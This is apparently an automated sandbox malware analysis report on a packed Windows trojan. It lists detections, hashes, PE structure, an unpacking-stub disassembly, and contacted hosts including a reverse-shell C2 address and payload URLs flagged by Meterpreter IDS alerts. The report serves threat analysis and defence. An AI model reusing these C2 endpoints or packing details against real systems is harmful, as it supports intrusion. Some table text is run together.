          Obfuscated Files or Information
          LSA Secrets1
          Account Discovery
          SSHKeylogging13
          Application Layer Protocol
          Scheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
          Software Packing
          Cached Domain Credentials1
          System Owner/User Discovery
          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
          DLL Side-Loading
          DCSync2
          System Information Discovery
          Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          31#U544a.exe13%ReversingLabs
          31#U544a.exe27%VirustotalBrowse
          31#U544a.exe100%AviraHEUR/AGEN.1324414
          31#U544a.exe100%Joe Sandbox ML
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          http://code.liveapi.com/0%Avira URL Cloudsafe
          https://202.175.7.146:10203/bfs/svg-next/BDC/playdata_square_line/v1.json#y0%Avira URL Cloudsafe
          https://202.175.7.146:10203/bfs/svg-next/BDC/playdata_square_line/v1.json-x0%Avira URL Cloudsafe
          http://code.liveapi.com/y0%Avira URL Cloudsafe
          http://code.liveapi.com/.0%Avira URL Cloudsafe
          https://202.175.7.146:10203/bfs/svg-next/BDC/playdata_square_line/v1.jsonF0%Avira URL Cloudsafe
          http://stream.liveapi.com/0%Avira URL Cloudsafe
          https://202.175.7.146:10203/y0%Avira URL Cloudsafe
          http://code.liveapi.com/gzip0%Avira URL Cloudsafe
          http://code.liveapi.com/d060%Avira URL Cloudsafe
          https://202.175.7.146:10203/bfs/svg-next/BDC/playdata_square_line/v1.jsonsy0%Avira URL Cloudsafe
          https://202.175.7.146:10203/0%Avira URL Cloudsafe
          https://202.175.7.146:10203/bfs/svg-next/BDC/playdata_square_line/v1.json0%Avira URL Cloudsafe
          https://202.175.7.146:10203/bfs/svg-next/BDC/playdata_square_line/v1.json7y0%Avira URL Cloudsafe
          https://202.175.7.146:10203/bfs/svg-next/BDC/playdata_square_line/v1.jsonP0%Avira URL Cloudsafe
          https://202.175.7.146:10203/l0%Avira URL Cloudsafe
          https://202.175.7.146:10203/dll0%Avira URL Cloudsafe
          https://202.175.7.146:10203/bfs/svg-next/BDC/playdata_square_line/v1.jsonyy0%Avira URL Cloudsafe
          202.175.7.1460%Avira URL Cloudsafe
          https://202.175.7.146:10203/;q=0.80%Avira URL Cloudsafe
          https://202.175.7.146:10203/bfs/svg-next/BDC/playdata_square_line/v1.jsonorientation?0%Avira URL Cloudsafe
          https://202.175.7.146:10203/bfs/svg-next/BDC/playdata_square_line/v1.jsonr0%Avira URL Cloudsafe
          https://leganse.oss-cn-hangzhou.aliyuncs.com/update.json;(0%Avira URL Cloudsafe
          https://202.175.7.146:10203/ll0%Avira URL Cloudsafe
          http://crl.mZ6/0%Avira URL Cloudsafe
          https://leganse.oss-cn-hangzhou.aliyuncs.com/update.json0%Avira URL Cloudsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          leganse.oss-cn-hangzhou.aliyuncs.com
          118.31.219.225
          truefalse
            unknown
            NameMaliciousAntivirus DetectionReputation
            202.175.7.146true
            • Avira URL Cloud: safe
            unknown
            NameSourceMaliciousAntivirus DetectionReputation
            https://202.175.7.146:10203/bfs/svg-next/BDC/playdata_square_line/v1.json#y31#U544a.exe, 00000000.00000002.2904739603.000001912B0F4000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://code.liveapi.com/y31#U544a.exe, 00000000.00000003.1878032408.000001912B106000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1883833961.000001912B106000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://code.liveapi.com/31#U544a.exe, 00000000.00000003.1953586887.000001912B6C5000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1883833961.000001912B0F4000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1878032408.000001912B09C000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://code.liveapi.com/d0631#U544a.exe, 00000000.00000003.1746035165.000001912B09A000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://202.175.7.146:10203/y31#U544a.exe, 00000000.00000003.1746035165.000001912B061000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://code.liveapi.com/.31#U544a.exe, 00000000.00000002.2904739603.000001912B106000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://stream.liveapi.com/31#U544a.exe, 00000000.00000002.2904739603.000001912B02C000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://code.liveapi.com/gzip31#U544a.exe, 00000000.00000003.1953841512.000001912B0FB000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000002.2905242341.000001912B6E8000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1953628567.000001912B0F4000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1746035165.000001912B0F4000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1883833961.000001912B0F4000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://202.175.7.146:10203/bfs/svg-next/BDC/playdata_square_line/v1.jsonF31#U544a.exe, 00000000.00000003.1883833961.000001912B09D000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1953628567.000001912B09A000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1878032408.000001912B09C000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://202.175.7.146:10203/bfs/svg-next/BDC/playdata_square_line/v1.json-x31#U544a.exe, 00000000.00000002.2904739603.000001912B0F4000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1953628567.000001912B0F4000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://202.175.7.146:10203/bfs/svg-next/BDC/playdata_square_line/v1.jsonsy31#U544a.exe, 00000000.00000003.1878032408.000001912B0F4000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://202.175.7.146:10203/bfs/svg-next/BDC/playdata_square_line/v1.json7y31#U544a.exe, 00000000.00000002.2904739603.000001912B0F4000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://202.175.7.146:10203/bfs/svg-next/BDC/playdata_square_line/v1.json31#U544a.exe, 00000000.00000002.2904739603.000001912B09A000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1746035165.000001912B048000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1878032408.000001912B0F4000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1953628567.000001912B048000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1883833961.000001912B048000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1883833961.000001912B0F4000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://202.175.7.146:10203/31#U544a.exe, 00000000.00000002.2904739603.000001912B09A000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://202.175.7.146:10203/l31#U544a.exe, 00000000.00000002.2904739603.000001912B09A000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://202.175.7.146:10203/bfs/svg-next/BDC/playdata_square_line/v1.jsonP31#U544a.exe, 00000000.00000003.1746035165.000001912B09A000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://202.175.7.146:10203/bfs/svg-next/BDC/playdata_square_line/v1.jsonyy31#U544a.exe, 00000000.00000002.2904739603.000001912B0F4000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1953628567.000001912B0F4000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1878032408.000001912B0F4000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1883833961.000001912B0F4000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://202.175.7.146:10203/;q=0.831#U544a.exe, 00000000.00000002.2904739603.000001912B09A000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://202.175.7.146:10203/dll31#U544a.exe, 00000000.00000003.1878032408.000001912B106000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1883833961.000001912B106000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://leganse.oss-cn-hangzhou.aliyuncs.com/update.json;(31#U544a.exe, 00000000.00000003.1690727037.000001912B09A000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1690624284.000001912B09A000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1690360896.000001912B09A000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://202.175.7.146:10203/bfs/svg-next/BDC/playdata_square_line/v1.jsonorientation?31#U544a.exe, 00000000.00000002.2904739603.000001912B09A000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://202.175.7.146:10203/ll31#U544a.exe, 00000000.00000003.1953628567.000001912B09A000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://202.175.7.146:10203/bfs/svg-next/BDC/playdata_square_line/v1.jsonr31#U544a.exe, 00000000.00000002.2904739603.000001912B09A000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://github.com/DosX-dev/UPX-Patcher31#U544a.exefalse
              high
              https://leganse.oss-cn-hangzhou.aliyuncs.com/update.json31#U544a.exe, 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://crl.mZ6/31#U544a.exe, 00000000.00000003.1690676459.000001912B0B7000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1690624284.000001912B09A000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1690360896.000001912B09A000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              202.175.7.146
              unknownMacau
              4609CTM-MOCompanhiadeTelecomunicacoesdeMacauSARLMOtrue
              118.31.219.225
              leganse.oss-cn-hangzhou.aliyuncs.comChina
              37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdfalse
              Joe Sandbox version:41.0.0 Charoite
              Analysis ID:1568880
              Start date and time:2024-12-05 05:29:06 +01:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 4m 35s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:5
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:31#U544a.exe
              renamed because original name is a hash value
              Original Sample Name:CEAP.exe
              Detection:MAL
              Classification:mal100.troj.evad.winEXE@1/2@1/2
              EGA Information:
              • Successful, ratio: 100%
              HCA Information:
              • Successful, ratio: 96%
              • Number of executed functions: 58
              • Number of non-executed functions: 61
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
              • Excluded IPs from analysis (whitelisted): 93.184.221.240
              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com
              • Not all processes where analyzed, report is missing behavior information
              • Report size exceeded maximum capacity and may have missing disassembly code.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
              TimeTypeDescription
              23:30:04API Interceptor68x Sleep call for process: 31#U544a.exe modified
              No context
              No context
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdUhEi3Rge75.exeGet hashmaliciousUnknownBrowse
              • 123.60.37.61
              m68k.elfGet hashmaliciousMiraiBrowse
              • 8.152.225.233
              teste.sh4.elfGet hashmaliciousGafgyt, Mirai, Moobot, OkiruBrowse
              • 8.188.217.61
              teste.x86_64.elfGet hashmaliciousGafgyt, Mirai, Moobot, OkiruBrowse
              • 8.171.83.89
              teste.i686.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
              • 118.31.17.247
              teste.mips.elfGet hashmaliciousGafgyt, Mirai, Moobot, OkiruBrowse
              • 8.144.123.166
              teste.mpsl.elfGet hashmaliciousGafgyt, Mirai, Moobot, OkiruBrowse
              • 121.197.47.171
              shell.elfGet hashmaliciousUnknownBrowse
              • 39.102.210.162
              teste.arm.elfGet hashmaliciousGafgyt, Mirai, Moobot, OkiruBrowse
              • 8.138.48.156
              xd.mips.elfGet hashmaliciousMiraiBrowse
              • 223.7.99.35
              CTM-MOCompanhiadeTelecomunicacoesdeMacauSARLMOsora.sh4.elfGet hashmaliciousMiraiBrowse
              • 96.7.114.141
              la.bot.sh4.elfGet hashmaliciousMiraiBrowse
              • 60.246.95.89
              mips.elfGet hashmaliciousUnknownBrowse
              • 60.246.156.118
              arm.elfGet hashmaliciousMiraiBrowse
              • 113.52.88.76
              apep.sh4.elfGet hashmaliciousMiraiBrowse
              • 202.175.82.210
              http://202.175.83.249:5603/wsGet hashmaliciousUnknownBrowse
              • 202.175.83.249
              botx.x86.elfGet hashmaliciousMiraiBrowse
              • 113.52.88.93
              botnet.m68k.elfGet hashmaliciousMirai, MoobotBrowse
              • 113.52.88.64
              byte.mips.elfGet hashmaliciousMirai, OkiruBrowse
              • 182.93.8.190
              la.bot.arm5.elfGet hashmaliciousUnknownBrowse
              • 202.175.124.140
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              3b5074b1b5d032e5620f69f9f700ff0eR7bv9d6gTH.dllGet hashmaliciousUnknownBrowse
              • 118.31.219.225
              Patch.exeGet hashmaliciousPureLog Stealer, XWormBrowse
              • 118.31.219.225
              RuntimeBroker.exeGet hashmaliciousPureLog Stealer, XWormBrowse
              • 118.31.219.225
              Qsgtknmtt.exeGet hashmaliciousUnknownBrowse
              • 118.31.219.225
              Fzcaaz.exeGet hashmaliciousUnknownBrowse
              • 118.31.219.225
              Ekyrfzxogk.exeGet hashmaliciousUnknownBrowse
              • 118.31.219.225
              EHak.exeGet hashmaliciousUnknownBrowse
              • 118.31.219.225
              Qsgtknmtt.exeGet hashmaliciousUnknownBrowse
              • 118.31.219.225
              Fzcaaz.exeGet hashmaliciousUnknownBrowse
              • 118.31.219.225
              Ekyrfzxogk.exeGet hashmaliciousUnknownBrowse
              • 118.31.219.225
              No context
              Process:C:\Users\user\Desktop\31#U544a.exe
              File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
              Category:dropped
              Size (bytes):71954
              Entropy (8bit):7.996617769952133
              Encrypted:true
              SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
              MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
              SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
              SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
              SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
              Malicious:false
              Reputation:high, very likely benign file
              Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
              Process:C:\Users\user\Desktop\31#U544a.exe
              File Type:data
              Category:modified
              Size (bytes):328
              Entropy (8bit):3.150184159866505
              Encrypted:false
              SSDEEP:6:kK5+E/99UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:7kDnLNkPlE99SNxAhUe/3
              MD5:393E59913911675E6C52C5E6941F58C6
              SHA1:DFC06F6B103121C1A94D00794B86E0B48C86B545
              SHA-256:B4A933BB6326516BCE077D51CE1BA4DEBDACB0BE01E5E98A284B73A34874707D
              SHA-512:D05765A0559DD8272ED77FA1BF6DBD66BC771CF671BC386D7EC7D7F5629B54DC5F69F06F8A73F8CF4708E5B212AEA11F7B2B77136F15D0AC842640754A81748E
              Malicious:false
              Reputation:low
              Preview:p...... .........H.Z.F..(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
              File type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
              Entropy (8bit):7.726439725283899
              TrID:
              • Win64 Executable (generic) (12005/4) 74.95%
              • Generic Win/DOS Executable (2004/3) 12.51%
              • DOS Executable Generic (2002/1) 12.50%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
              File name:31#U544a.exe
              File size:604'672 bytes
              MD5:7d6748d103f78d1a8ddab5646c5cb1a3
              SHA1:744a3590531665487bf22bc7df7b45663a30790f
              SHA256:8ac3f3a5bd3ba1cb8490cf1c69c364a39feac66ee084cf218f3dd11e9be3ac92
              SHA512:f701291cc808db5f2cfb756d7d4e1ec45ddf416b3ea0e2791bf516d544c51c73091bc11aa13aa605cdef3eb5589de06f7c27723af3d92bbe11b60b57d5e58116
              SSDEEP:12288:LkSJ9QlQees48K16BqxLARYHBKbkHZchG3tggAWvg0w7K4OwThyy:wDmqIMGH+kj3CgA50wNthyy
              TLSH:D6D423A7B387501AD5D0DE75E42BE4F958193C3D280C9EEA30C92D37A2D1A58CA850BF
              File Content Preview:MZ......................@...............................................!..L.!https://github.com/DosX-dev/UPX-Patcher...$.......PE..d...@.Og...............&.......................@..........................................`... ............................
              Icon Hash:3144bb9595dda5a2
              Entrypoint:0x1401416c0
              Entrypoint Section:.fish
              Digitally signed:false
              Imagebase:0x140000000
              Subsystem:windows gui
              Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
              Time Stamp:0x674FC340 [Wed Dec 4 02:49:36 2024 UTC]
              TLS Callbacks:0x4014195b, 0x1
              CLR (.Net) Version:
              OS Version Major:4
              OS Version Minor:0
              File Version Major:4
              File Version Minor:0
              Subsystem Version Major:4
              Subsystem Version Minor:0
              Import Hash:dc9212f457632d496b253cd0ecc2dd4d
              Instruction
              push ebx
              push esi
              push edi
              push ebp
              dec eax
              lea esi, dword ptr [FFF7895Ah]
              dec eax
              lea edi, dword ptr [esi-000B9025h]
              dec eax
              lea eax, dword ptr [edi+0012B16Ch]
              push dword ptr [eax]
              mov dword ptr [eax], 254B0A9Ah
              push eax
              push edi
              xor ebx, ebx
              xor ecx, ecx
              dec eax
              or ebp, FFFFFFFFh
              call 00007F8BC1443975h
              add ebx, ebx
              je 00007F8BC1443924h
              rep ret
              mov ebx, dword ptr [esi]
              dec eax
              sub esi, FFFFFFFCh
              adc ebx, ebx
              mov dl, byte ptr [esi]
              rep ret
              dec eax
              lea eax, dword ptr [edi+ebp]
              cmp ecx, 05h
              mov dl, byte ptr [eax]
              jbe 00007F8BC1443943h
              dec eax
              cmp ebp, FFFFFFFCh
              jnbe 00007F8BC144393Dh
              sub ecx, 04h
              mov edx, dword ptr [eax]
              dec eax
              add eax, 04h
              sub ecx, 04h
              mov dword ptr [edi], edx
              dec eax
              lea edi, dword ptr [edi+04h]
              jnc 00007F8BC1443911h
              add ecx, 04h
              mov dl, byte ptr [eax]
              je 00007F8BC1443932h
              dec eax
              inc eax
              mov byte ptr [edi], dl
              sub ecx, 01h
              mov dl, byte ptr [eax]
              dec eax
              lea edi, dword ptr [edi+01h]
              jne 00007F8BC1443912h
              rep ret
              cld
              inc ecx
              pop ebx
              jmp 00007F8BC144392Ah
              dec eax
              inc esi
              mov byte ptr [edi], dl
              dec eax
              inc edi
              mov dl, byte ptr [esi]
              add ebx, ebx
              jne 00007F8BC144392Ch
              mov ebx, dword ptr [esi]
              dec eax
              sub esi, FFFFFFFCh
              adc ebx, ebx
              mov dl, byte ptr [esi]
              jc 00007F8BC1443908h
              lea eax, dword ptr [ecx+01h]
              jmp 00007F8BC1443929h
              dec eax
              inc ecx
              call ebx
              adc eax, eax
              inc ecx
              call ebx
              adc eax, eax
              add ebx, ebx
              jne 00007F8BC144392Ch
              mov ebx, dword ptr [esi]
              dec eax
              sub esi, FFFFFFFCh
              adc ebx, ebx
              mov dl, byte ptr [esi]
              jnc 00007F8BC1443906h
              sub eax, 03h
              jc 00007F8BC144393Bh
              shl eax, 08h
              NameVirtual AddressVirtual Size Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IMPORT0x14d9c40x29c.rsrc
              IMAGE_DIRECTORY_ENTRY_RESOURCE0x1420000xb9c4.rsrc
              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x11d0000x62d0.fish
              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
              IMAGE_DIRECTORY_ENTRY_BASERELOC0x14dc600x14.rsrc
              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
              IMAGE_DIRECTORY_ENTRY_TLS0x1419880x28.fish
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
              .dosx0x10000xb90000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .fish0xba0000x880000x87a00f0f9493292be0a56c7515fbd2d072cb4False0.9674881192396313data7.90743698825191IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .rsrc0x1420000xc0000xbe007e23854d476d5de11568c28b3d5fab11False0.06400082236842106data1.6668765497907099IMAGE_SCN_TYPE_COPY, IMAGE_SCN_LNK_OTHER, IMAGE_SCN_LNK_INFO, IMAGE_SCN_LNK_OVER, IMAGE_SCN_LNK_REMOVE, IMAGE_SCN_LNK_COMDAT, IMAGE_SCN_MEM_PRELOAD, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_LNK_NRELOC_OVFL, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE
              NameRVASizeTypeLanguageCountryZLIB Complexity
              RT_ICON0x1421000xb648Device independent bitmap graphic, 200 x 400 x 8, image size 40000, 256 important colorsEnglishUnited States0.050124292816732384
              RT_GROUP_ICON0x14d74c0x14dataEnglishUnited States1.15
              RT_VERSION0x14d7640x260dataEnglishUnited States0.4720394736842105
              DLLImport
              ADVAPI32.dllRegCloseKey
              api-ms-win-core-synch-l1-2-0.dllWaitOnAddress
              bcryptprimitives.dllProcessPrng
              crypt32.dllCertOpenStore
              KERNEL32.DLLLoadLibraryA, CopyContext, GetProcAddress, VirtualProtect
              msvcrt.dllexit
              ntdll.dllNtWriteFile
              secur32.dllDecryptMessage
              ws2_32.dllbind
              Language of compilation systemCountry where language is spokenMap
              EnglishUnited States
              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
              2024-12-05T05:29:55.785387+01002035651ET MALWARE Meterpreter or Other Reverse Shell SSL Cert1202.175.7.14610203192.168.2.449917TCP
              2024-12-05T05:30:02.018686+01002035651ET MALWARE Meterpreter or Other Reverse Shell SSL Cert1202.175.7.14610203192.168.2.449731TCP
              2024-12-05T05:30:07.601315+01002035651ET MALWARE Meterpreter or Other Reverse Shell SSL Cert1202.175.7.14610203192.168.2.449733TCP
              2024-12-05T05:30:11.022236+01002035651ET MALWARE Meterpreter or Other Reverse Shell SSL Cert1202.175.7.14610203192.168.2.449734TCP
              2024-12-05T05:30:14.429556+01002035651ET MALWARE Meterpreter or Other Reverse Shell SSL Cert1202.175.7.14610203192.168.2.449735TCP
              2024-12-05T05:30:17.857559+01002035651ET MALWARE Meterpreter or Other Reverse Shell SSL Cert1202.175.7.14610203192.168.2.449738TCP
              2024-12-05T05:30:21.424773+01002035651ET MALWARE Meterpreter or Other Reverse Shell SSL Cert1202.175.7.14610203192.168.2.449742TCP
              2024-12-05T05:30:24.882636+01002035651ET MALWARE Meterpreter or Other Reverse Shell SSL Cert1202.175.7.14610203192.168.2.449744TCP
              2024-12-05T05:30:28.370918+01002035651ET MALWARE Meterpreter or Other Reverse Shell SSL Cert1202.175.7.14610203192.168.2.449745TCP
              2024-12-05T05:30:31.802831+01002035651ET MALWARE Meterpreter or Other Reverse Shell SSL Cert1202.175.7.14610203192.168.2.449746TCP
              2024-12-05T05:30:35.237676+01002035651ET MALWARE Meterpreter or Other Reverse Shell SSL Cert1202.175.7.14610203192.168.2.449747TCP
              2024-12-05T05:30:39.114934+01002035651ET MALWARE Meterpreter or Other Reverse Shell SSL Cert1202.175.7.14610203192.168.2.449748TCP
              2024-12-05T05:30:42.545267+01002035651ET MALWARE Meterpreter or Other Reverse Shell SSL Cert1202.175.7.14610203192.168.2.449749TCP
              2024-12-05T05:30:45.997969+01002035651ET MALWARE Meterpreter or Other Reverse Shell SSL Cert1202.175.7.14610203192.168.2.449750TCP
              2024-12-05T05:30:49.454200+01002035651ET MALWARE Meterpreter or Other Reverse Shell SSL Cert1202.175.7.14610203192.168.2.449751TCP
